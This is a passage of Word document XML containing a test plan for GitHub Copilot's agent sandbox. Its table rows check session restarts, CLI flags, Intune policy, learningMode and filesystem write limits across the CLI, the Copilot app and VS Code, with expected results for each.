              <w:t xml:space="preserve"> can relax them in a trusted workspace. Unconfirmed by Microsoft: test each key; managed policy must still win</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Repo file has no effect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Running sessions vs new</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Change a setting while a session is open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Open sessions keep old policy; restart (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">copilot --continue</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) or run </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox enable</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> there</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Applies to new sessions or after </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">/restart-session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">New sessions inherit host config; explicit session choice persists on restore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">One-off flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">copilot --sandbox -p "run git status"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--no-sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--sandbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> sandboxes that run; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--no-sandbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ⛔ refused when managed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--no-sandbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> runs unsandboxed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Intune change picked up</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Change a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">HKLM\SOFTWARE\Policies\GitHubCopilot</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ New value within the hourly re-check 🔍 (restart to be sure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Same 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Run </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Developer: Sync Account Policy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, then Policy Diagnostics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Rollback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Delete </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sandbox.*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> registry values / revert server commit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox no longer forced; user setting decides</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Back to user choice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Team override</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (server)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Put test user in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">copilot-sbx-exempt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> team with a reduced </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sandbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Team object </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">replaces</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> the whole default — only what it restates applies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Same (if VS Code enforcement confirmed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">learningMode "allow"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Ring 0, Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Ask agent to write to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">%USERPROFILE%\Desktop\x.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">curl</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> a non-allowed host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ File write </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">succeeds and is recorded</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; network still ⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Same (runtime enforces managed object)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Expected same; confirm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Write succeeds, nothing recorded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">learningMode "deny"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Ring 1+)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same as EN-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Write blocked </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">and recorded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Same 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Write succeeds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> learningMode has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">no effect in WSL2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Windows-only feature). Run EN-12/13 on native Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Filesystem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">The sandbox is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">deny-by-default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CWD (and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) read/write, temp and build caches writable, tools on PATH and system locations read-only. With it OFF, every case here succeeds — that is the risk being tested.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="868"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1711"/>
        <w:gridCol w:w="1543"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1226"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">How to test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – Copilot app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – VS Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Edit inside workspace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Ask agent: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">echo test &gt; notes.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in repo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Git metadata writes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git add . &amp;&amp; git commit -m test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.git</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> is R/W. Older Windows builds: use </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git -C "C:\path\repo" status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Write above CWD in same repo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Start session in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">repo\src</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, write </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">..\README.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Rest of repo is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">read-only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 App grants workspace + CWD — confirm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Only CWD auto-granted — confirm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Write outside repo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">echo x &gt; %USERPROFILE%\Desktop\x.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
